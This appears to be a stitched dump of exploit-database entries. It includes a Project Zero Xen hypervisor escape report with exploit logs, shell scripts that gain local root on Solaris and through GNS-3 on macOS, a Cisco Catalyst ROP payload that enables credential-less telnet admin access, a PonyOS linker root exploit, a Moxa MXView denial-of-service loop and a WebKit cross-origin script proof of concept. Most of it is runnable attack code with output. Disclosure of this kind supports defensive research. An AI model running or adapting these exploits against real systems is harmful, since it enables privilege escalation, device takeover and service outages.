#5 0x10c30623a in WTF::HashTableAddResult<WTF::HashTableIterator<WTF::RefPtr<WTF::UniquedStringImpl>, WTF::KeyValuePair<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry>, WTF::KeyValuePairKeyExtractor<WTF::KeyValuePair<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry> >, JSC::IdentifierRepHash, WTF::HashMap<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry, JSC::IdentifierRepHash, WTF::HashTraits<WTF::RefPtr<WTF::UniquedStringImpl> >, JSC::SymbolTableIndexHashTraits>::KeyValuePairTraits, WTF::HashTraits<WTF::RefPtr<WTF::UniquedStringImpl> > > > WTF::HashMap<WTF::RefPtr<WTF::UniquedStringImpl>, JSC::SymbolTableEntry, JSC::IdentifierRepHash, WTF::HashTraits<WTF::RefPtr<WTF::UniquedStringImpl> >, JSC::SymbolTableIndexHashTraits>::add<JSC::SymbolTableEntry>(WTF::RefPtr<WTF::UniquedStringImpl> const&, JSC::SymbolTableEntry&&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x167223a)
#6 0x10c305cca in JSC::SymbolTable::cloneScopePart(JSC::VM&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1671cca)
#7 0x10b2c01e4 in JSC::CodeBlock::setConstantRegisters(WTF::Vector<JSC::WriteBarrier<JSC::Unknown>, 0ul, WTF::CrashOnOverflow, 16ul> const&, WTF::Vector<JSC::SourceCodeRepresentation, 0ul, WTF::CrashOnOverflow, 16ul> const&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x62c1e4)
#8 0x10b2bba44 in JSC::CodeBlock::finishCreation(JSC::VM&, JSC::ScriptExecutable*, JSC::UnlinkedCodeBlock*, JSC::JSScope*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x627a44)
#9 0x10c290c73 in JSC::FunctionCodeBlock::create(JSC::VM*, JSC::FunctionExecutable*, JSC::UnlinkedFunctionCodeBlock*, JSC::JSScope*, WTF::PassRefPtr<JSC::SourceProvider>, unsigned int, unsigned int) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x15fcc73)
#10 0x10c2901ea in JSC::ScriptExecutable::newCodeBlockFor(JSC::CodeSpecializationKind, JSC::JSFunction*, JSC::JSScope*, JSC::JSObject*&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x15fc1ea)
#11 0x10c29182a in JSC::ScriptExecutable::prepareForExecutionImpl(JSC::VM&, JSC::JSFunction*, JSC::JSScope*, JSC::CodeSpecializationKind, JSC::CodeBlock*&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x15fd82a)
#12 0x10bf2c921 in JSC::LLInt::setUpCall(JSC::ExecState*, JSC::Instruction*, JSC::CodeSpecializationKind, JSC::JSValue, JSC::LLIntCallLinkInfo*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1298921)
#13 0x10bf3b9ce in llint_entry (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a79ce)
#14 0x10bf34faa in vmEntryToJavaScript (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a0faa)
#15 0x10bbf7d1d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf63d1d)
#16 0x10bb80c6d in JSC::Interpreter::execute(JSC::ProgramExecutable*, JSC::ExecState*, JSC::JSObject*) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xeecc6d)
#17 0x10b371316 in JSC::evaluate(JSC::ExecState*, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6dd316)
#18 0x10b37151e in JSC::profiledEvaluate(JSC::ExecState*, JSC::ProfilingReason, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x6dd51e)
#19 0x116201743 in WebCore::JSMainThreadExecState::profiledEvaluate(JSC::ExecState*, JSC::ProfilingReason, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24f5743)
#20 0x1162012b4 in WebCore::ScriptController::evaluateInWorld(WebCore::ScriptSourceCode const&, WebCore::DOMWrapperWorld&, WebCore::ExceptionDetails*) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24f52b4)
#21 0x116214881 in WebCore::ScriptElement::executeClassicScript(WebCore::ScriptSourceCode const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2508881)
#22 0x116211943 in WebCore::ScriptElement::prepareScript(WTF::TextPosition const&, WebCore::ScriptElement::LegacyTypeSupport) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2505943)
#23 0x114a13b5c in WebCore::HTMLScriptRunner::runScript(WebCore::Element*, WTF::TextPosition const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd07b5c)
#24 0x114a13895 in WebCore::HTMLScriptRunner::execute(WTF::PassRefPtr<WebCore::Element>, WTF::TextPosition const&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd07895)
#25 0x11493fc35 in WebCore::HTMLDocumentParser::runScriptsForPausedTreeBuilder() (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc33c35)
#26 0x114940372 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc34372)
#27 0x11493f544 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc33544)
#28 0x114940f9d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc34f9d)
#29 0x1143a3df1 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x697df1)
SUMMARY: AddressSanitizer: heap-buffer-overflow (webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1671069) in JSC::SymbolTableEntry::isWatchable() const
Shadow bytes around the buggy address:
0x1c1800019180: 00 00 00 00 00 00 06 fa fa fa fa fa fa fa fa fa
0x1c1800019190: 00 fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
0x1c18000191a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c18000191b0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x1c18000191c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1c18000191d0: fa[fa]fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c18000191e0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x1c18000191f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c1800019200: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c1800019210: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x1c1800019220: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==55079==ABORTING
-->
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1184
This bug report describes a vulnerability in memory_exchange() that
permits PV guest kernels to write to an arbitrary virtual address with
hypervisor privileges. The vulnerability was introduced through a
broken fix for CVE-2012-5513 / XSA-29.
The fix for CVE-2012-5513 / XSA-29 introduced the following check in
the memory_exchange() hypercall handler:
if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
!guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
{
rc = -EFAULT;
goto fail_early;
}
guest_handle_okay() calls array_access_ok(), which calls access_ok(),
which is implemented as follows:
/*
* Valid if in +ve half of 48-bit address space, or above
* Xen-reserved area.
* This is also valid for range checks (addr, addr+size). As long
* as the start address is outside the Xen-reserved area then we
* will access a non-canonical address (and thus fault) before
* ever reaching VIRT_START.
*/
#define __addr_ok(addr) \
(((unsigned long)(addr) < (1UL<<47)) || \
((unsigned long)(addr) >= HYPERVISOR_VIRT_END))
#define access_ok(addr, size) \
(__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))
As the comment states, access_ok() only checks the address, not the
size, if the address points to guest memory, based on the assumption
that any caller of access_ok() will access guest memory linearly,
starting at the supplied address. Callers that want to access a
subrange of the memory referenced by a guest handle are supposed to
use guest_handle_subrange_okay(), which takes an additional start
offset parameter, instead of guest_handle_okay().
memory_exchange() uses guest_handle_okay(), but only accesses the
guest memory arrays referenced by exch.in.extent_start and
exch.out.extent_start starting at exch.nr_exchanged, a 64-bit offset.
The intent behind exch.nr_exchanged is that guests always set it to 0
and nonzero values are only set when a hypercall has to be restarted
because of preemption, but this isn't enforced.
Therefore, by invoking this hypercall with crafted arguments, it is
possible to write to an arbitrary memory location that is encoded as
exch.out.extent_start + 8 * exch.nr_exchanged
where exch.out.extent_start points to guest memory and
exch.nr_exchanged is an attacker-chosen 64-bit value.
I have attached a proof of concept. This PoC demonstrates the issue by
overwriting the first 8 bytes of the IDT entry for #PF, causing the
next pagefault to doublefault. To run the PoC, unpack it in a normal
64-bit PV domain and run the following commands in the domain as root:
root@pv-guest:~# cd crashpoc
root@pv-guest:~/crashpoc# make -C /lib/modules/$(uname -r)/build M=$(pwd)
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
LD /root/crashpoc/built-in.o
CC [M] /root/crashpoc/module.o
nasm -f elf64 -o /root/crashpoc/native.o /root/crashpoc/native.asm
LD [M] /root/crashpoc/test.o
Building modules, stage 2.
MODPOST 1 modules
WARNING: could not find /root/crashpoc/.native.o.cmd for /root/crashpoc/native.o
CC /root/crashpoc/test.mod.o
LD [M] /root/crashpoc/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/crashpoc# insmod test.ko
root@pv-guest:~/crashpoc# rmmod test
The machine on which I tested the PoC was running Xen 4.6.0-1ubuntu4
(from Ubuntu 16.04.2). Executing the PoC caused the following console
output:
(XEN) *** DOUBLE FAULT ***
(XEN) ----[ Xen-4.6.0 x86_64 debug=n Tainted: C ]----
(XEN) CPU: 0
(XEN) RIP: e033:[<0000557b46f56860>] 0000557b46f56860
(XEN) RFLAGS: 0000000000010202 CONTEXT: hypervisor
(XEN) rax: 00007fffe9cfafd0 rbx: 00007fffe9cfd160 rcx: 0000557b47ebd040
(XEN) rdx: 0000000000000001 rsi: 0000000000000004 rdi: 0000557b47ec52e0
(XEN) rbp: 00007fffe9cfd158 rsp: 00007fffe9cfaf30 r8: 0000557b46f7df00
(XEN) r9: 0000557b46f7dec0 r10: 0000557b46f7df00 r11: 0000557b47ec5878
(XEN) r12: 0000557b47ebd040 r13: 00007fffe9cfb0c0 r14: 0000557b47ec52e0
(XEN) r15: 0000557b47ed5e70 cr0: 0000000080050033 cr4: 00000000001506a0
(XEN) cr3: 0000000098e2e000 cr2: 00007fffe9cfaf93
(XEN) ds: 0000 es: 0000 fs: 0000 gs: 0000 ss: e02b cs: e033
(XEN)
(XEN) ****************************************
(XEN) Panic on CPU 0:
(XEN) DOUBLE FAULT -- system shutdown
(XEN) ****************************************
(XEN)
(XEN) Reboot in five seconds...
I strongly recommend changing the semantics of access_ok() so that it
guarantees that any access to an address inside the specified range is
valid. Alternatively, add some prefix, e.g. "UNSAFE_", to the names of
access_ok() and appropriate wrappers to prevent people from using
these functions improperly. Currently, in my opinion, the function
name access_ok() is misleading.
Proof of Concept: xen_memory_exchange_crashpoc.tar
################################################################################
I have written an exploit (attached).
Usage (in an unprivileged PV guest with kernel headers, gcc, make, nasm and hexdump):
root@pv-guest:~/privesc_poc# ./compile.sh
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
LD /root/privesc_poc/built-in.o
CC [M] /root/privesc_poc/module.o
nasm -f elf64 -o /root/privesc_poc/native.o /root/privesc_poc/native.asm
LD [M] /root/privesc_poc/test.o
Building modules, stage 2.
MODPOST 1 modules
WARNING: could not find /root/privesc_poc/.native.o.cmd for /root/privesc_poc/native.o
CC /root/privesc_poc/test.mod.o
LD [M] /root/privesc_poc/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/privesc_poc# ./attack 'id > /tmp/owned_by_the_guest'
press enter to continue
<press enter>
root@pv-guest:~/privesc_poc#
dmesg in the unprivileged PV guest:
[ 721.413415] call_int_85 at 0xffffffffc0075a90
[ 721.420167] backstop_85_handler at 0xffffffffc0075a93
[ 722.801566] PML4 at ffff880002fe3000
[ 722.808216] PML4 entry: 0x13bba4067
[ 722.816161] ### trying to write crafted PUD entry...
[ 722.824178] ### writing byte 0
[ 722.832193] write_byte_hyper(ffff88007a491008, 0x7)
[ 722.840254] write_byte_hyper successful
[ 722.848234] ### writing byte 1
[ 722.856170] write_byte_hyper(ffff88007a491009, 0x80)
[ 722.864219] write_byte_hyper successful
[ 722.872241] ### writing byte 2
[ 722.880215] write_byte_hyper(ffff88007a49100a, 0x35)
[ 722.889014] write_byte_hyper successful
[ 722.896232] ### writing byte 3
[ 722.904265] write_byte_hyper(ffff88007a49100b, 0x6)
[ 722.912599] write_byte_hyper successful
[ 722.920246] ### writing byte 4
[ 722.928270] write_byte_hyper(ffff88007a49100c, 0x0)
[ 722.938554] write_byte_hyper successful
[ 722.944231] ### writing byte 5
[ 722.952239] write_byte_hyper(ffff88007a49100d, 0x0)
[ 722.961769] write_byte_hyper successful
[ 722.968221] ### writing byte 6
[ 722.976219] write_byte_hyper(ffff88007a49100e, 0x0)
[ 722.984319] write_byte_hyper successful
[ 722.992233] ### writing byte 7
[ 723.000234] write_byte_hyper(ffff88007a49100f, 0x0)
[ 723.008341] write_byte_hyper successful
[ 723.016254] ### writing byte 8
[ 723.024357] write_byte_hyper(ffff88007a491010, 0x0)
[ 723.032254] write_byte_hyper successful
[ 723.040236] ### crafted PUD entry written
[ 723.048199] dummy
[ 723.056199] going to link PMD into target PUD
[ 723.064238] linked PMD into target PUD
[ 723.072206] going to unlink mapping via userspace PUD
[ 723.080230] mapping unlink done
[ 723.088251] copying HV and user shellcode...
[ 723.096283] copied HV and user shellcode
[ 723.104270] int 0x85 returned 0x7331
[ 723.112237] remapping paddr 0x13bb86000 to vaddr 0xffff88000355a800
[ 723.120192] IDT entry for 0x80 should be at 0xffff83013bb86800
[ 723.128226] remapped IDT entry for 0x80 to 0xffff804000100800
[ 723.136260] IDT entry for 0x80: addr=0xffff82d08022a3d0, selector=0xe008, ist=0x0, p=1, dpl=3, s=0, type=15
[ 723.144291] int 0x85 returned 0x1337
[ 723.152235] === END ===
The supplied shell command executes in dom0 (and all other 64bit PV domains):
root@ubuntu:~# cat /tmp/owned_by_the_guest
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#
Note that the exploit doesn't clean up after itself - shutting down the attacking domain will panic the hypervisor.
I have tested the exploit in the following configurations:
configuration 1:
running inside VMware Workstation
Xen version "Xen version 4.6.0 (Ubuntu 4.6.0-1ubuntu4.3)"
dom0: Ubuntu 16.04.2, Linux 4.8.0-41-generic #44~16.04.1-Ubuntu
unprivileged guest: Ubuntu 16.04.2, Linux 4.4.0-66-generic #87-Ubuntu
configuration 2:
running on a physical machine with Qubes OS 3.1 installed
Xen version 4.6.3
Proof of Concept: privesc_poc.tar.gz
################################################################################
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41870.zip
#!/bin/ksh
#Exploit PoC reverse engineered from EXTREMEPARR which provides
#local root on Solaris 7 - 11 (x86 & SPARC). Uses a environment
#variable of setuid binary dtappgather to manipulate file
#permissions and create a user owned directory anywhere on the
#system (as root). Can then add a shared object to locale folder
#and run setuid binaries with an untrusted library file.
#
# e.g.
# $ id;uname -a; ./dtappgather-poc.sh
# uid=60001(nobody) gid=60001(nobody)
# SunOS sparc 5.8 Generic_117350-39 sun4m sparc SUNW,SPARCstation-20
# [+] '/usr/dt/bin/dtappgather' directory traversal exploit
# [-] get rid of any of our desktop files
# [-] exploiting the traversal bug...
# changePermissions: /var/dt/appconfig/appmanager/..| : No such file or directory
# MakeDirectory: /var/dt/appconfig/appmanager/..: File exists
# changePermissions: /var/dt/appconfig/appmanager/..| : No such file or directory
# [-] symlink attack create our directory
# dr-xr-xr-x 2 nobody nobody 512 Apr 11 14:40 pdkhax
# [-] Done. "/usr/lib/locale/pdkhax" is writeable
# $
#
# To get root privileges simply exploit "at" by adding a .so.2
# file in the new locale directory and calling "at".
#
# $ at -f /etc/passwd 11:11
# job 1491991860.a at Ons Apr 12 11:11:00 2017
# $ LC_TIME=pdkhax at -l
# # id
# uid=0(root) gid=60001(nobody)
#
# -- Hacker Fantastic (www.myhackerhouse.com)
echo "[+] '/usr/dt/bin/dtappgather' directory traversal exploit"
echo "[-] get rid of any of our desktop files"
chmod -R 777 /var/dt/appconfig/appmanager/*
rm -rf /var/dt/appconfig/appmanager/*
echo [-] exploiting the traversal bug...
DTUSERSESSION=. /usr/dt/bin/dtappgather
DTUSERSESSION=. /usr/dt/bin/dtappgather
DTUSERSESSION=.. /usr/dt/bin/dtappgather
DTUSERSESSION=.. /usr/dt/bin/dtappgather
DTUSERSESSION=.. /usr/dt/bin/dtappgather
echo [-] symlink attack create our directory
ln -sf /usr/lib/locale /var/dt/appconfig/appmanager
DTUSERSESSION=pdkhax /usr/dt/bin/dtappgather
ls -al /usr/lib/locale | grep pdkhax
rm -rf /var/dt/appconfig/appmanager
chmod 755 /usr/lib/locale/pdkhax
echo [-] Done. "/usr/lib/locale/pdkhax" is writeable
#!/bin/sh
# GNS-3 Mac OS-X LPE local root exploit
# =====================================
# GNS-3 on OS-X bundles the "ubridge" binary as a setuid
# root file. This file can be used to read arbitary files
# using "-f" arguement but also as it runs as root can also
# write arbitrary files with "pcap_file" arguement within
# configuration ini file. It is possible to abuse this utility
# to also write arbitary contents by bridging a UDP tunnel
# and writing to disk. We can exploit these mishaps to gain
# root privileges on a host that has GNS-3 installed by
# writing a malicious crontab entry and escalating privileges.
# This exploit takes advantage of this flaw to overwrite
# root crontab with our own entry and to spawn a root shell.
# Don't forget to clean up in /usr/lib/spool/tabs and /tmp
# after running. Tested on GNS-3 version 1.5.2. The root user
# must have a crontab installed (even an empty one set with
# crontab -e) or the box rebooted after first attempt to get
# commands to execute with this cron method.
#
# $ ./gns3super-osx.sh
# [+] GNS-3 Mac OS-X local root LPE exploit 0day
# [-] creating ubridge.ini file...
# [-] Launching ubridge..
# [-] Preparing cron script...
# Parsing prdelka
# Creating UDP tunnel 40000:127.0.0.1:40001
# Creating UDP tunnel 50000:127.0.0.1:50001
# Starting packet capture to /usr/lib/cron/tabs/root with protocol (null)
# unknown link type (null), assuming Ethernet.
# Capturing to file '/usr/lib/cron/tabs/root'
# Source NIO listener thread for prdelka has started
# Destination NIO listener thread for prdelka has started
# [-] making magic packet client...
# [-] packet fired
# [-] Waiting a minute for the exploit magic...
# -rwsr-xr-x 1 root wheel 1377872 Apr 12 23:32 /tmp/pdkhax
# [-] Got Root?
# # id
# uid=501(hackerfantastic) gid=20(staff) euid=0(root)
#
# -- Hacker Fantastic (www.myhackerhouse.com)
echo "[+] GNS-3 Mac OS-X local root LPE exploit 0day"
echo "[-] creating ubridge.ini file..."
cat > ubridge.ini << EOF
[prdelka]
source_udp = 40000:127.0.0.1:40001
destination_udp = 50000:127.0.0.1:50001
pcap_file = "/usr/lib/cron/tabs/root"
EOF
echo "[-] Launching ubridge.."
/Applications/GNS3.app/Contents/Resources/ubridge &
echo "[-] Preparing cron script..."
cat > /tmp/pdk.sh << EOF
cp /bin/ksh /tmp/pdkhax
chown 0:0 /tmp/pdkhax
chmod 4755 /tmp/pdkhax
EOF
chmod 755 /tmp/pdk.sh
echo "[-] making magic packet client..."
cat > udphax.c << EOF
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
int main(int argc, char* argv[]) {
struct sockaddr_in si_other, srcaddr;
int s, i, slen=sizeof(si_other);
char* pkt = "\n* * * * * /tmp/pdk.sh\n\n";
s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
memset((char *) &si_other, 0, sizeof(si_other));
si_other.sin_family = AF_INET;
si_other.sin_port = htons(50000);
inet_aton("127.0.0.1", &si_other.sin_addr);
srcaddr.sin_family = AF_INET;
srcaddr.sin_addr.s_addr = htonl(INADDR_ANY);
srcaddr.sin_port = htons(50001);
bind(s,(struct sockaddr *) &srcaddr, sizeof(srcaddr));
sendto(s,pkt,strlen(pkt),0,(struct sockaddr *)&si_other, slen);
printf("[-] packet fired\n");
}
EOF
gcc udphax.c -o udphax
./udphax
echo "[-] Waiting a minute for the exploit magic..."
rm -rf udphax* ubridge.ini
pkill ubridge
sleep 60
rm -rf /tmp/pdk.sh
ls -al /tmp/pdkhax
echo "[-] Got Root?"
/tmp/pdkhax
#!/usr/bin/python
# Exploit Title: Cisco Catalyst 2960 - Buffer Overflow
# Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
# Date: 04.10.2017
# Exploit Author: https://twitter.com/artkond
# Vendor Homepage: https://www.cisco.com/
# Version: IOS version c2960-lanbasek9-mz.122-55.SE11)
# Tested on: Catalyst 2960 with IOS version c2960-lanbasek9-mz.122-55.SE11
# CVE : CVE-2017-3881
# Description:
#
# The exploit connects to the Catalyst switch and patches
# it execution flow to allow credless telnet interaction
# with highest privilege level
#
import socket
import sys
from time import sleep
set_credless = True
if len(sys.argv) < 3:
print sys.argv[0] + ' [host] --set/--unset'
sys.exit()
elif sys.argv[2] == '--unset':
set_credless = False
elif sys.argv[2] == '--set':
pass
else:
print sys.argv[0] + ' [host] --set/--unset'
sys.exit()
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 23))
print '[+] Connection OK'
print '[+] Recieved bytes from telnet service:', repr(s.recv(1024))
print '[+] Sending cluster option'
print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'
payload = '\xff\xfa\x24\x00'
payload += '\x03CISCO_KITS\x012:'
payload += 'A' * 116
payload += '\x00\x00\x37\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
#next bytes are shown as offsets from r1
payload += '\x02\x3d\x55\xdc' # +8 address of pointer to is_cluster_mode function - 0x34
if set_credless is True:
payload += '\x00\x00\x99\x9c' # +12 set address of func that rets 1
else:
payload += '\x00\x04\xeA\xe0' # unset
payload += 'BBBB' # +16(+0) r1 points here at second gadget
payload += '\x00\xe1\xa9\xf4' # +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
payload += 'CCCC' # +8
payload += 'DDDD' # +12
payload += 'EEEE' # +16(+0) r1 points here at third gadget
payload += '\x00\x06\x7b\x5c' # +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
payload += '\x02\x3d\x55\xc8' # +8 r1+8 = 0x23d55c8
payload += 'FFFF' # +12
payload += 'GGGG' # +16(+0) r1 points here at fourth gadget
payload += '\x00\x6c\xb3\xa0' # +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
if set_credless:
payload += '\x00\x27\x0b\x94' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr;
else:
payload += '\x00\x04\xe7\x78' # unset
payload += 'HHHH' # +12
payload += 'IIII' # +16(+0) r1 points here at fifth gadget
payload += '\x01\x4a\xcf\x98' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
payload += 'JJJJ' # +8 r1 points here at third gadget
payload += 'KKKK' # +12
payload += 'LLLL' # +16
payload += '\x01\x14\xe7\xec' # +20 original execution flow return addr
payload += ':15:' + '\xff\xf0'
s.send(payload)
print '[+] All done'
s.close()
#!/usr/bin/python
#PonyOS 4.0 has added several improvements over previous releases
#including support for setuid binaries and dynamic libraries. The
#run-time linker does not sanitize environment variables when
#running setuid files allowing for local root exploitation through
#manipulated LD_LIBRARY_PATH. Requires build-essential installed
#to compile the malicious library.
import shutil
import os
if __name__=="__main__":
print("[+] fluttershy - dynamic linker exploit for ponyos 4.0")
shutil.copyfile("/usr/lib/libc.so","/tmp/libc.so")
shutil.copyfile("/usr/lib/libm.so","/tmp/libm.so")
shutil.copyfile("/usr/lib/libpng15.so","/tmp/libpng15.so")
shutil.copyfile("/usr/lib/libtoaru-graphics.so","/tmp/libtoaru-graphics.so")
shutil.copyfile("/usr/lib/libtoaru-kbd.so","/tmp/libtoaru-kbd.so")
shutil.copyfile("/usr/lib/libtoaru-rline.so","/tmp/libtoaru-rline.so")
shutil.copyfile("/usr/lib/libtoaru-list.so","/tmp/libtoaru-list.so")
shutil.copyfile("/usr/lib/libtoaru-sha2.so","/tmp/libtoaru-sha2.so")
shutil.copyfile("/usr/lib/libtoaru-termemu.so","/tmp/libtoaru-termemu.so")
shutil.copyfile("/usr/lib/libz.so", "/tmp/libz.so")
fd = open("/tmp/lib.c","w")
fd.write("#include <stdio.h>\n#include <stdlib.h>\n\n")
fd.write("void toaru_auth_check_pass(char* username, char* password){\n")
fd.write("\tprintf(\"[+] pony smash!\\n\");\n}\n")
fd.close()
os.system("gcc -fpic -c /tmp/lib.c")
os.system("gcc -shared -o /tmp/libtoaru-toaru_auth.so /tmp/lib.o")
os.environ["LD_LIBRARY_PATH"] = "/tmp"
os.system("sudo sh")
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MOXA-MXVIEW-v2.8-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
============
www.moxa.com
Product:
===========
MXView v2.8
Download:
http://www.moxa.com/product/MXstudio.htm
MXview Industrial Network Management Software.
Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notification—anytime, anywhere.
Vulnerability Type:
===================
Denial Of Service
CVE Reference:
==============
CVE-2017-7456
Security Issue:
================
Remote attackers can DOS MXView server by sending large string of junk characters for the user ID and password field login credentials.
Exploit/POC:
=============
import urllib,urllib2
print 'Moxa MXview v2.8 web interface DOS'
print 'hyp3rlinx'
IP=raw_input("[Moxa MXView IP]>")
PAYLOAD="A"*200000000
url = 'http://'+IP+'/goform/account'
data = urllib.urlencode({'uid' : PAYLOAD, 'pwd' : PAYLOAD, 'action' : 'login'})
while 1:
req = urllib2.Request(url, data)
res = urllib2.urlopen(req)
print res
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
==========================================================
Vendor Notification: March 5, 2017
Vendor confirms vulnerability : March 21, 2017
Vendor "updated firmware April 7, 2017" : March 29, 2017
April 9, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1094
Once a spread operation is optimized, the function |operationSpreadGeneric| will be called from then on. But operationSpreadGeneric's trying to get a JSGlobalObject from the argument of a spread operation.
It seems that that optimization is not implemented to the release version of Safari yet.
Tested on the Nighly 10.0.2(12602.3.12.0.1, r210957)
PoC:
-->
<body>
<script>
'use strict';
function spread(a) {
return [...a];
}
let arr = Object.create([1, 2, 3, 4]);
for (let i = 0; i < 0x10000; i++) {
spread(arr);
}
let f = document.body.appendChild(document.createElement('iframe'));
f.onload = () => {
f.onload = null;
try {
spread(f.contentWindow);
} catch (e) {
e.constructor.constructor('alert(location)')();
}
};
f.src = 'https://abc.xyz/';
</script>
</body>
<!--
